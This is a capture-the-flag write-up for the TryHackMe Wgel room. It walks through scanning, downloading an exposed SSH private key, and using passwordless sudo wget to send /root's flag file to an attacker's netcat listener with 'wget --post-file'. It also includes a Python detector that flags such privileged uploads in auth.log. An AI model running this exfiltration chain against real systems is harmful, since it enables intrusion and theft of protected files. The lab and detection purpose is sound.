Wgel CTF TryHackMe Write-up

Wgel CTF is an easy, beginner-friendly capture the flag exercise on TryHackMe. It features bad code commenting practices, a publicly available SSH key, and poorly configured sudo permissions which lead to exfiltration of data from the target server.

Disclaimer 2: This post will include spoilers for the room, so be mindful of reading this if you want to solve the challenge on your own. Flags and other secrets will remain obfuscated.

Enumeration

We start off the exercise with a pretty aggressive Nmap scan to minimize steps, since we aren't worried about being detected in this case. We would take more careful precautions if this were a real life pentest, but to speed up the process we are going this route.

nmap -A -T4 10.10.54.54

The scan reveals SSH is available on port 22 and that there is an HTTP server behind port 80. Let's go ahead and check out that web page and see what we find.


Exploration and further enumeration

Navigating to the webpage reveals the default Apache2 landing page. Usually, there isn't much to find here, so we are going to jump straight to enumerating other potential directories with gobuster.

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u 10.10.54.54

The scan reveals a few new directories, including /sitemap and /server-status. After spending entirely too much time combing through both pages and their source code to find nothing of note, we decide to enumerate each one further with gobuster. Thankfully, we find a wordlist that provides some results on /sitemap.

gobuster dir -w /usr/share/wordlists/dirb/common.txt -u 10.10.54.54/sitemap

This step reveals some information about the target, including a hidden .ssh directory. Navigating to the directory in the browser reveals an RSA private key. We download the file to our computer for use at a later time.

wget http://10.10.54.54/sitemap/.ssh/id_rsa

Taking a Step Back

We seem to have hit a roadblock. We have an SSH private key but no username to go along with it. So, we take a step back to see what we missed thus far.

We revisit the Apache2 landing page from earlier and give it a thorough evaluation. After scanning the source code, we see what we missed. The developer seems to have left a comment in the code, revealing a potential username we can try with our recently uncovered RSA key: Jessie.

sudo ssh -i id_rsa jessie@10.10.54.54

Trying to connect with the key warns us that the permissions are too open. So, we need to fix that before we can connect. Thankfully, changing the permissions isn't difficult at all.

chmod 600 id_rsa

We then try to connect again via SSH, and bingo, we are in. Now, let's identify that user flag using the locate command.

locate user_flag.txt

Escalating Privileges

Now that we have captured our first flag, it's time to escalate our privileges and go after the root flag.

We first check what commands Jessie can run as root.

sudo -l

This reveals that we can run wget as sudo with no password. Let's head over to GTFOBins to see what we can find.

Now, using what we learn from GTFOBins, we can try to escalate our privileges to become root and capture the flag that way, but I couldn't get that to work even after quite a bit of tinkering.

Instead, we are going to use wget to exfiltrate the root flag fairly easily. First, we need to set up a netcat listener on our attacking machine. And of course we are going to use port 1337 because we are elite hackerz.

nc -lvnp 1337

Now, on the victim machine, we need to use wget to capture the root flag and send it to our attacking machine.

sudo wget --post-file=/root/root_flag.txt 10.10.229.4:1337

And there it is, the root flag: the second and final answer in the Wgel CTF room.
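On the defender's side, the step above is what a log monitor should catch: sudo records every privileged command in auth.log, and a NOPASSWD rule for a download tool becomes a root-level file reader as soon as an upload flag appears. The following detector is an added example, not part of the original write-up; it assumes the standard sudo syslog record layout, and the sample lines are constructed (the destination address is the attacking machine used above).

```python
import re

# The record sudo writes to auth.log/syslog for each command it runs, e.g.
#   sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget ...
SUDO_RE = re.compile(
    r"sudo:\s+(?P<user>\S+) : .*?USER=(?P<runas>\S+) ; COMMAND=(?P<cmd>.*)$"
)

# Options that turn a "download" tool into an uploader of local data.
UPLOAD_FLAGS = {
    "wget": ("--post-file", "--post-data", "--body-file", "--body-data"),
    "curl": ("-T", "--upload-file", "-d", "--data", "--data-binary", "-F", "--form"),
}

def parse_sudo_line(line):
    """Return (user, runas, command) for a sudo command record, else None."""
    m = SUDO_RE.search(line)
    if not m:
        return None
    return m.group("user"), m.group("runas"), m.group("cmd").strip()

def is_upload(binary, args):
    """True if the argv for wget/curl carries a flag that ships data out."""
    flags = UPLOAD_FLAGS.get(binary, ())
    return any(a == f or a.startswith(f + "=") for a in args for f in flags)

def find_sudo_exfil(lines):
    """Return [(user, binary, command)] for privileged wget/curl uploads."""
    findings = []
    for line in lines:
        parsed = parse_sudo_line(line)
        if parsed is None:
            continue
        user, runas, cmd = parsed
        argv = cmd.split() or [""]
        binary = argv[0].rsplit("/", 1)[-1]  # /usr/bin/wget -> wget
        if runas == "root" and is_upload(binary, argv[1:]):
            findings.append((user, binary, cmd))
    return findings

# Constructed sample records (not captured from the room); the destination
# is the attacking-machine address used in the write-up.
SAMPLE_AUTH_LOG = """\
Jan  5 10:12:01 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget https://example.invalid/update.tar.gz
Jan  5 10:12:44 wgel sudo:   jessie : TTY=pts/0 ; PWD=/home/jessie ; USER=root ; COMMAND=/usr/bin/wget --post-file=/root/root_flag.txt 10.10.229.4:1337
Jan  5 10:13:02 wgel sudo: pam_unix(sudo:session): session opened for user root by jessie(uid=0)
"""

if __name__ == "__main__":
    for user, binary, cmd in find_sudo_exfil(SAMPLE_AUTH_LOG.splitlines()):
        print(f"ALERT: {user} ran {binary} as root: {cmd}")
```

The plain download on the first line is left alone; only the record carrying `--post-file` is reported, which is the signal a sudoers review (any `NOPASSWD` entry for wget or curl) should have removed in the first place.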


Summary

And with that, we've completed the challenge. We started by enumerating all the ports and services on the target. We then moved to scanning for directories on the domain and reading webpage source code.

Through this process, we were able to obtain SSH credentials to log into the target, gaining a foothold into the system. Finally, we used misconfigured sudo privileges to exfiltrate the target data owned by the root user.

Tags: #CTF